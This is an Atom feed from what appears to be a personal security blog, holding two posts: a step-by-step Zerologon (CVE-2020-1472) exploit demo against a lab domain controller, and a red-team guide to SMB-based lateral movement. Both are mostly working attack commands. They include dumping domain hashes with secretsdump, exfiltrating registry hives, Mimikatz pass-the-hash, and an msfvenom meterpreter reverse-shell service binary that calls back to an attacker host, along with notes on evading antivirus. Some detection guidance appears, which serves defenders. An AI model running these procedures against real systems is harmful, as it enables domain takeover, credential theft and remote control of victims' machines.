Jekyll2021-05-11T06:39:19+00:00https://nv2lt.github.io/atom.xmlnv2lt - Scratching the SurfaceScratching the surface on cyber security and system administration... nv2ltCVE-2020-1472, Exploit Demo2020-09-17T00:00:00+00:002020-09-17T00:00:00+00:00https://nv2lt.github.io/windows/CVE-2020-1472-Step-by-Step-Procedure<h1 id="preamble">Preamble</h1>
<p>In September 2020, the <a href="https://www.secura.com/pathtoimg.php?id=2055">whitepaper</a> for the CVE-2020-1472 vulnerability and the <a href="https://github.com/SecuraBV/CVE-2020-1472">Zerologon testing script</a> were released.<br />
This post is a step-by-step procedure for using a specific exploit released by dirkjanm in <a href="https://github.com/dirkjanm/CVE-2020-1472">Github</a> and restoring the changes made in order to avoid problems in the Domain Controller’s functionality after the execution of the exploit.</p>
<h1 id="exploit-usage">Exploit Usage</h1>
<ul>
<li>For this demo the Domain Controller NetBios name is <code class="language-plaintext highlighter-rouge">DC01</code>, its IP is <code class="language-plaintext highlighter-rouge">172.16.40.5</code> and the domain is <code class="language-plaintext highlighter-rouge">worklab.local</code>.</li>
<li>Impacket version 0.9.22 is already installed.
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python cve-2020-1472-exploit.py dc01 172.16.40.5
</code></pre></div> </div>
</li>
</ul>
<p><img src="/assets/exploit-success.png" alt="exploit-success" /></p>
<ul>
<li>Use impacket secretsdump to dump the credentials stored in ntds
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py <span class="nt">-just-dc</span> <span class="nt">-no-pass</span> worklab/DC01<span class="se">\$</span>@172.16.40.5
<span class="c"># Since hash :31d6cfe0d16ae931b73c59d7e0c089c0 is the default empty password we can also use the command</span>
secretsdump.py worklab/DC01<span class="se">\$</span>@172.16.40.5 <span class="nt">-hashes</span> :31d6cfe0d16ae931b73c59d7e0c089c0
</code></pre></div> </div>
<p><img src="/assets/creds_dumped.png" alt="creds-dumped" /></p>
</li>
<li>As we can see we have the hashes of all users (including domain admin), the krbtgt hash, while the hash of the <code class="language-plaintext highlighter-rouge">DC01$</code> is empty (<code class="language-plaintext highlighter-rouge">:31d6cf0.....</code>)</li>
</ul>
<h1 id="restoring-dc-password">Restoring DC password</h1>
<ul>
<li>As it is mentioned in the <a href="https://www.secura.com/pathtoimg.php?id=2055">whitepaper</a> this exploit changes the password of the DC that is stored in AD (ntds) and not the one stored locally in SAM and in <code class="language-plaintext highlighter-rouge">HKLM\SECURITY\Policy\Secrets\$machine.ACC</code>. This causes the DC to misbehave in various unpretectible ways.</li>
<li>So, after getting the hashes above, it is advisable to restore the password of the DC.</li>
<li>We can get the original password from SAM. Two methods are demonstrated here.</li>
</ul>
<h2 id="first-method">First Method</h2>
<ul>
<li>Download SAM from the DC by getting a shell with the administrator hashes we got earlier
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:217.... worklab/user1@172.16.40.5
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit
</code></pre></div> </div>
<p><img src="/assets/getting_sam.png" alt="getting_sam" /></p>
</li>
<li>
<p><strong>Be aware of the opsec considerations when using impacket wmiexec</strong></p>
</li>
<li>Get password from the files downloaded locally
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
</code></pre></div> </div>
<p><img src="/assets/machine-pass.png" alt="machine-pass" /></p>
</li>
<li>Restore password in ntds
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python restorepassword.py worklab.local/dc01@dc01 -target-ip 172.16.40.5 -hexpass 88b5869b8daad1f8a5177aa1d96c120e9da01e....
</code></pre></div> </div>
<p><img src="/assets/restore-pass.png" alt="restore-pass" /></p>
</li>
<li>Check that the restore was successfull
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># This should give us an error since the DC01 password is not empty now
secretsdump.py -just-dc -no-pass worklab/DC01\$@172.16.40.5
</code></pre></div> </div>
<p><img src="/assets/check-restore.png" alt="check-restore" /></p>
</li>
</ul>
<h2 id="second-method---impacket-version-0921">Second Method - Impacket Version 0.9.21</h2>
<ul>
<li>With latest ipacket method we can use secretsdump with domain admin hash that we got previously in order to get locally stored password of the DC
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py worklab/user1@dc01 <span class="nt">-target-ip</span> 172.16.40.5 <span class="nt">-hashes</span> aad3b435b51404eeaad3b435b51404ee:217e....
</code></pre></div> </div>
<p><img src="/assets/getting_sam-secretsdump.png" alt="getting_sam-secretsdump" /></p>
</li>
<li>
<p><strong>Note that in order to do so it starts service RemoteRegistry which is something that Blue teams can spot.</strong></p>
</li>
<li>After that we continue as in First Method.</li>
</ul>nv2ltPreamble In September 2020, the whitepaper for the CVE-2020-1472 vulnerability and the Zerologon testing script were released. This post is a step-by-step procedure for using a specific exploit released by dirkjanm in Github and restoring the changes made in order to avoid problems in the Domain Controller’s functionality after the execution of the exploit.Windows Lateral Movement with smb, psexec and alternatives2020-09-08T00:00:00+00:002020-09-08T00:00:00+00:00https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to<h1 id="scope">Scope</h1>
<p>During a red team engangement there are several choices for lateral movement, whether you have credentials or hashes. Each choice has different configuration requirements in order to work, while it leaves different fingerprints on the remote machine.<br />
This post is about summarizing some of these lateral movement techniques based on SMB and checking the differences between them.<br />
In a later post I ll try to summarize more lateral movement techniques like WinRM, WMI, PSRemote, RDP Hijacking and their alternatives with C# tools.</p>
<h1 id="smb-psexecsmbexecwinexe">SMB-(PsExec,Smbexec,winexe)</h1>
<h2 id="preamble">Preamble</h2>
<ul>
<li>In general, we execute remote commands (like powershell, vssadmin) over SMB using named pipes.</li>
<li>These tools leave behind a service binary and they are logged as a <code class="language-plaintext highlighter-rouge">Windows Event #5145</code>.</li>
<li>In short, the key facts are:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> PORTS Used: TCP 445(SMB), 135(RPC)
AUTH: Local Administrator Access
Tools: winexe, psexec (sysinternals, impacket), smbexec,...
Signatures: Service binaries left behind, Windows Event #5145
</code></pre></div> </div>
</li>
<li>All techniques that use SMB/RPC protocols for lateral movement need to have <strong>admin shares enabled</strong>. This is enabled by default in a windows domain environment but in order to test them on a non-domain machine we need to enable the Default Admin Shares (<code class="language-plaintext highlighter-rouge">C$, ADMIN$</code>). This includes the following:
<ul>
<li>Enable Administrator account and set a password</li>
<li>Open relevant ports on Windows Firewall. For a complete how to check: <a href="https://www.repairwin.com/enable-admin-shares-windows-10-8-7">Enable Deafult Admin Shares</a>, but <strong>in brief</strong>:
<ul>
<li>The easiest way is to enable File and Printer Sharing checkbox on the menu <code class="language-plaintext highlighter-rouge">Allow an app through Windows Firewall</code> from within <code class="language-plaintext highlighter-rouge">System and Security Settings</code><br />
From cmd:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=yes
</code></pre></div> </div>
</li>
<li>In case the attacker machine is in a different subnet from the target machine, the scope of the above setting sould be changed. In advanced firewall settings <code class="language-plaintext highlighter-rouge">File and Printer Sharing (NB-Session-In)</code> and <code class="language-plaintext highlighter-rouge">File and Printer Sharing(SMB-IN)</code> scope sould be <code class="language-plaintext highlighter-rouge">any</code> instead of <code class="language-plaintext highlighter-rouge">local subnet</code>.</li>
</ul>
</li>
<li>Disable the <code class="language-plaintext highlighter-rouge">LocalAccountTokenFilterPolicy</code> in registry (<code class="language-plaintext highlighter-rouge">value=0x1</code>) appropriately.
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
</code></pre></div> </div>
<ul>
<li><strong>Note</strong> on <code class="language-plaintext highlighter-rouge">LocalAccountTokenFilterPolicy</code>
<ul>
<li>After Windows Vista, any remote connection (wmi, psexec, etc) with any non-RID 500 local admin account (local to the remote machine account), returns a token that is “filtered”, which means <code class="language-plaintext highlighter-rouge">medium integrity</code> even if the user is a local administrator to the remote machine.</li>
<li>So, when the user attempts to access privileged resource remotely (e.g. <code class="language-plaintext highlighter-rouge">ADMIN$</code>), he gets an <code class="language-plaintext highlighter-rouge">Access Denied</code> message, despite having administrative access to the remote machine as a local user.</li>
<li>In other words:
<blockquote>
<p>When a user who is a member of the local administrators group on the target remote computer establishes a remote administrative connection…they will not connect as a full administrator. The user has no elevation potential on the remote computer, and the user cannot perform administrative tasks. If the user wants to administer the workstation with a Security Account Manager (SAM) account, the user must interactively log on to the computer that is to be administered with Remote Assistance or Remote Desktop.</p>
</blockquote>
</li>
<li>This behaviour depends on the <code class="language-plaintext highlighter-rouge">LocalAccountFilterPolicy</code>. By disabling it, a user, who is member of the local administrators group on the target remote computer, will get a <code class="language-plaintext highlighter-rouge">high integrity</code> access token. So, in this case, psexec, wmi etc will work.</li>
<li>The above <strong>does not</strong> apply with the default local administrator account (RID 500). This account is not being affected by the <code class="language-plaintext highlighter-rouge">LocalAccountFilterPolicy</code>, so it will always get a high integrity token. By default this account is disabled in windows but in some corporate environments it might be enabled.</li>
<li>On the other hand:
<blockquote>
<p>When a user with a domain user account logs on to a Windows Vista computer remotely, and the user is a member of the Administrators group, the domain user will run with a full administrator access token on the remote computer and UAC is disabled for the user on the remote computer for that session.</p>
</blockquote>
</li>
<li>The above explains why in a domain environment a domain user that has local administrative privileges on a remote machine can use psexec for lateral movement (has high integrity token on remote connection)</li>
<li>For more details: <a href="https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167">posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>Having enabled the default Admin shares on a single machine we can proceed to check the various techniques as following:</li>
</ul>
<hr />
<h2 id="sysinternals-psexec">Sysinternals PsExec</h2>
<ul>
<li>PsExec is part of the <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite">Sysinternals Suite</a></li>
<li>The way it works is as following:
<ul>
<li>Connects to <code class="language-plaintext highlighter-rouge">ADMIN$=C:\Windows</code> share folder and uploads a <code class="language-plaintext highlighter-rouge">PSEXECSVC.exe</code> file.</li>
<li>Then uses Service Control Manager (sc) to start the service binary (service name <code class="language-plaintext highlighter-rouge">PsExecSVC</code>)</li>
<li>
<p>Creates a named pipe on the destination host and uses it for input/output operations.</p>
<p><img src="/assets/psexec-netflow.png" alt="psexec-netflow" /></p>
</li>
<li>
<p>Executes the program under a parent process of psexecsvc.exe. Parent process of psexecsvc.exe is <code class="language-plaintext highlighter-rouge">services.exe</code></p>
<p><img src="/assets/2020-07-20-psexecsvc.png" alt="psexecsvc-image" /></p>
</li>
<li>Upon completion of its task, the PsExecSVC Windows service will be stopped and the <code class="language-plaintext highlighter-rouge">PSEXESVC.exe</code> file will be deleted from <code class="language-plaintext highlighter-rouge">ADMIN$</code>.</li>
</ul>
</li>
</ul>
<h3 id="usage-examples">Usage Examples:</h3>
<ul>
<li>Semi interactive shell with admin credentials:
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">psexec.exe</span><span class="w"> </span><span class="nx">/accepteula</span><span class="w"> </span><span class="nx">\\192.168.1.2</span><span class="w"> </span><span class="nt">-u</span><span class="w"> </span><span class="nx">LAB\admin</span><span class="w"> </span><span class="nt">-p</span><span class="w"> </span><span class="nx">password</span><span class="w"> </span><span class="nx">cmd.exe</span><span class="se">`
</span></code></pre></div> </div>
</li>
<li>Semi interactive shell with NTLM hashes.<br />
By default, <strong>PsExec does not pass the hash</strong> by itself.<br />
However we can use Windows Credential Editor or <strong>Mimikatz</strong> for pass-the-hash and then utilize psexec.
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Get ntlm hashes with mimikatz</span><span class="w">
</span><span class="n">privilege::logonpasswords</span><span class="w">
</span><span class="c"># Spawn a new cmd as a different user using Mimikatz:</span><span class="w">
</span><span class="n">sekurlsa::pth</span><span class="w"> </span><span class="nx">/user:user1</span><span class="w"> </span><span class="nx">/domain:WORKGROUP</span><span class="w"> </span><span class="nx">/ntlm:217e50203a5aba59cefa863c724bf61b</span><span class="w">
</span><span class="c"># Psexec</span><span class="w">
</span><span class="n">PsExec.exe</span><span class="w"> </span><span class="nx">/accepteula</span><span class="w"> </span><span class="nx">\\192.168.1.2</span><span class="w"> </span><span class="nx">cmd.exe</span><span class="w">
</span></code></pre></div> </div>
</li>
</ul>
<h3 id="detection-on-target-machine">Detection on Target Machine</h3>
<ul>
<li>Since <code class="language-plaintext highlighter-rouge">psexecsvc.exe</code> is uploaded to target’s network share (<code class="language-plaintext highlighter-rouge">ADMIN$</code>) a windows event log id <code class="language-plaintext highlighter-rouge">5145</code> (network share was checked for access) will be logged.</li>
<li>Event id <code class="language-plaintext highlighter-rouge">7045</code> for initial service installation will also be logged.</li>
<li>Furthermore the existance of file <code class="language-plaintext highlighter-rouge">psexecsvc.exe</code> is an indication that psexec has been used to access target machine.</li>
</ul>
<h3 id="detection-on-source-host">Detection on Source host</h3>
<ul>
<li>A registry value is created when PsExec License Agreement has been agreed to.</li>
<li>Execution history (prefetch)</li>
</ul>
<hr />
<h2 id="impacket-psexecpy">Impacket PsExec.py</h2>
<ul>
<li><a href="https://github.com/SecureAuthCorp/impacket">Impacket Collection</a> is a well-known collection of Python classes for working with network protocols.</li>
<li>Impacket PsExec works similar to to sysinternals psexec.</li>
<li>Needs admin rights on target machine</li>
<li>Port used: 445</li>
<li>Instead of uploading psexeccsv service binary, it uploads to <code class="language-plaintext highlighter-rouge">ADMIN$</code> a service binary with an arbitrary name. It may be flagged and stopped by AV, EDR</li>
<li>Interactive binaries like (powershell, vssadmin, plink…) will cause the service to fail
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c">#Using credentials</span>
psexec.py user1:<span class="s2">"password"</span>@172.16.50.42 cmd.exe
<span class="c">#Using hashes</span>
psexec.py <span class="nt">-hashes</span> :217e50203a5aba59cefa863c724bf61b user1@172.16.50.42 cmd.exe
</code></pre></div> </div>
</li>
</ul>
<h2 id="psexec-like-without-psexec-using-sc-like-psexec-but-in-a-manual-way">PsExec-like without psexec (Using SC like psexec but in a manual way)</h2>
<ul>
<li>Requirements:
<ul>
<li>Port 139,445 open on the remote machine (smb)</li>
<li>Password or NTLM hash</li>
<li>Write permissions on a network shared folder. Doesn’t matter which one.<br />
NOTE: <code class="language-plaintext highlighter-rouge">NTFS permissions != Share Permissons</code>. So, permission to write locally is not enough</li>
<li>Permissions to create services on the remote machine: <code class="language-plaintext highlighter-rouge">SC_MANAGER_CREATE_SERVICE</code>-(Access mask: 0x0002)</li>
<li>Ability to start the service created: <br />
<code class="language-plaintext highlighter-rouge">SERVICE_QUERY_STATUS (Access mask: 0x0004) + SERVICE_START (Access mask: 0x0010)</code></li>
</ul>
</li>
<li>The last 2 requirements above are granted to administrators. So an unpriviliged user does not comply with them.</li>
<li>
<p>For more details check <a href="https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec">Lateral Movement- A deep look into psexec</a></p>
</li>
<li>Example
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Create an exe as a service</span>
msfvenom <span class="nt">-p</span> windows/x64/meterpreter/reverse_http <span class="nv">LHOST</span><span class="o">=</span>172.16.50.48 <span class="nv">LPORT</span><span class="o">=</span>8080 <span class="nt">-f</span> exe-service <span class="nt">--platform</span> windows <span class="nt">-e</span> x64/xor_dynamic <span class="nt">-o</span> meter64_service.exe
<span class="c"># List Shares</span>
smbclient <span class="nt">-L</span> 172.16.50.42 <span class="nt">-U</span> user1
</code></pre></div> </div>
<p><img src="/assets/smbclient_list_shares.png" alt="List Shares" /></p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Upload the exe to windows machine</span>
smbclient <span class="se">\\\\</span>172.16.50.42<span class="se">\\</span>smbshare <span class="nt">-U</span> user1 <span class="nt">-c</span> <span class="s2">"put meter64_service.exe test.exe"</span>
<span class="c"># Using impacket services.py create service remotely</span>
services.py WORKGROUP/user1@172.16.50.42 create <span class="nt">-name</span> testing <span class="nt">-display</span> testing1 <span class="nt">-path</span> <span class="s2">"</span><span class="se">\\\\</span><span class="s2">172.16.50.42</span><span class="se">\\</span><span class="s2">smbshare</span><span class="se">\\</span><span class="s2">test.exe"</span>
</code></pre></div> </div>
<p><img src="/assets/impacket_create_service.png" alt="Create Service" /></p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Using impacket services.py start the service and get the meterpreter shell</span>
services.py WORKGROUP/user1@172.16.50.42 start <span class="nt">-name</span> testing
</code></pre></div> </div>
<p><img src="/assets/meter_session.png" alt="PoC" /></p>
</li>
</ul>
<hr />
<h2 id="impacket-smbexecpy">Impacket smbexec.py</h2>
<ul>
<li>Part of the <a href="https://github.com/SecureAuthCorp/impacket">Impacket Collection</a>. It does not upload a service binary to target.</li>
<li>By default it creates a service with the name “BTOBTO”. Of course the name can be changed in <code class="language-plaintext highlighter-rouge">smbexec.py</code> under the variable <code class="language-plaintext highlighter-rouge">SERVICE_NAME=...</code>, or can be given as a command line parameter to <code class="language-plaintext highlighter-rouge">smbexec.py</code>.</li>
<li>For every command given:
<ul>
<li>Transfers commands for the attacker’s machine to the target machine via SMB as a bat file in <code class="language-plaintext highlighter-rouge">%TEMP%/execute.bat</code></li>
<li>A new service named “BTOBO” is created which does the following and then exits.</li>
<li>It echoes the command to be executed in a <code class="language-plaintext highlighter-rouge">bat</code> script, and redirects to stdout and stderror to a Temp file, then runs the bat script then deletes it.</li>
<li>Makes a call to an existing binary that already lives on the endpoint to execute commands, cmd.exe</li>
<li>It is actually a pseudo shell (<strong>Non-interactive Shell</strong>)</li>
<li><img src="/assets/smbexec_service_creation.png" alt="smbexec.py service creation" /></li>
</ul>
</li>
<li>Keep in mind that it does not drop any binary on the host (stealthier than psexec.py).
<ul>
<li><code class="language-plaintext highlighter-rouge">%COMSPEC%</code> is an environmental variable. <code class="language-plaintext highlighter-rouge">ComSpec=C:\WINDOWS\system32\cmd.exe</code></li>
</ul>
</li>
<li>Info was extracted from:
<ul>
<li><a href="https://book.hacktricks.xyz/windows/ntlm/smbexec">book.hacktricks.xyz</a></li>
<li><a href="https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/">Varonis - Stealthy password hacking with smbexec</a></li>
</ul>
</li>
<li>
<h2 id="tested-on-systems-with-different-avs-enabled-without-being-blocked-where-impacket-psexecpy-was-blocked">Tested on systems with different AVs enabled without being blocked where <code class="language-plaintext highlighter-rouge">impacket psexec.py</code> was blocked.</h2>
</li>
</ul>
<h2 id="winexe-statically-compiled--kali-winexe">Winexe Statically Compiled / Kali Winexe</h2>
<ul>
<li>It is the equivelant to psexec for linux</li>
<li>The version installed in Kali (<code class="language-plaintext highlighter-rouge">apt install winexe</code>) does not support smb v2, so it fails to execute in current verions of windows where smb v1 is depreciated.</li>
<li>Instructions for building a winexe version that supports smb v2 can be found below:
<ul>
<li><a href="https://community.opmantek.com/display/OA/Auditing+Windows+machines+from+Linux+using+SMB2">https://community.opmantek.com/display/OA/Auditing+Windows+machines+from+Linux+using+SMB2</a></li>
<li><a href="http://dl-openaudit.opmantek.com/winexe-static">http://dl-openaudit.opmantek.com/winexe-static</a></li>
<li><a href="https://whiteoaksecurity.com/blog/2019/10/15/tales-from-the-red-team-building-winexe">https://whiteoaksecurity.com/blog/2019/10/15/tales-from-the-red-team-building-winexe</a></li>
<li><a href="https://bitbucket.org/reevertcode/reevert-winexe-waf/src/master/">https://bitbucket.org/reevertcode/reevert-winexe-waf/src/master/</a></li>
</ul>
</li>
<li>Connects to <code class="language-plaintext highlighter-rouge">ADMIN$=C:\Windows</code> share folder and uploads a <code class="language-plaintext highlighter-rouge">winexesvc.exe</code> file.
<ul>
<li>Then uses Service Control Manager (sc) to start the service binary (service name <code class="language-plaintext highlighter-rouge">winexesvc</code>)</li>
<li>Creates a named pipe on the destination host and uses it for input/output operations.</li>
<li>It does not stop the service on exit and it does not delete the file in <code class="language-plaintext highlighter-rouge">c:\windows</code></li>
</ul>
</li>
<li>
<h2 id="tested-on-different-avs-without-being-blocked">Tested on different AVs without being blocked.</h2>
</li>
</ul>
<h2 id="metasploit-psexec">Metasploit PsExec</h2>
<ul>
<li>Same behaviour to sysinternals but when sc starts the service, it starts a new rundll32.exe process, allocates executable memory in the process and copies shellcode into it.
<ul>
<li><a href="https://blog.rapid7.com/2013/03/09/psexec-demystified/">https://blog.rapid7.com/2013/03/09/psexec-demystified/</a></li>
</ul>
</li>
<li>Modules in metasploit:
<pre>
exploit/windows/smb/psexec
exploit/windows/local/current_user_psexec
auxiliary/admin/smb/psexec_command
auxiliary/scanner/smb/psexec_loggedin_users
</pre>
</li>
<li>Service binaries for Metasploit PsExec are flaggged by AV</li>
</ul>
<hr />
<h2 id="psexec-alternatives">PSexec Alternatives</h2>
<ul>
<li>CSExec - A C Sharp psexec implementation
<ul>
<li><a href="https://github.com/malcomvetter/CSExec">https://github.com/malcomvetter/CSExec</a></li>
</ul>
</li>
<li>PAExec
<ul>
<li><a href="https://www.poweradmin.com/paexec/">https://www.poweradmin.com/paexec/</a></li>
<li><a href="https://github.com/poweradminllc/PAExec">https://github.com/poweradminllc/PAExec</a></li>
</ul>
</li>
</ul>
<h1 id="references">References</h1>
<ul>
<li><a href="https://labs.f-secure.com/blog/attack-detection-fundamentals-discovery-and-lateral-movement-lab-4">https://labs.f-secure.com/blog/attack-detection-fundamentals-discovery-and-lateral-movement-lab-4</a></li>
<li><a href="https://adamtheautomator.com/psexec-ultimate-guide/">https://adamtheautomator.com/psexec-ultimate-guide/</a></li>
<li><a href="https://jpcertcc.github.io/ToolAnalysisResultSheet/">https://jpcertcc.github.io/ToolAnalysisResultSheet/</a></li>
<li><a href="https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec">https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec</a></li>
<li><a href="https://book.hacktricks.xyz/windows/ntlm/smbexec">https://book.hacktricks.xyz/windows/ntlm/smbexec</a></li>
<li><a href="https://redcanary.com/blog/threat-hunting-psexec-lateral-movement/">https://redcanary.com/blog/threat-hunting-psexec-lateral-movement/</a></li>
</ul>nv2ltScope During a red team engangement there are several choices for lateral movement, whether you have credentials or hashes. Each choice has different configuration requirements in order to work, while it leaves different fingerprints on the remote machine. This post is about summarizing some of these lateral movement techniques based on SMB and checking the differences between them. In a later post I ll try to summarize more lateral movement techniques like WinRM, WMI, PSRemote, RDP Hijacking and their alternatives with C# tools.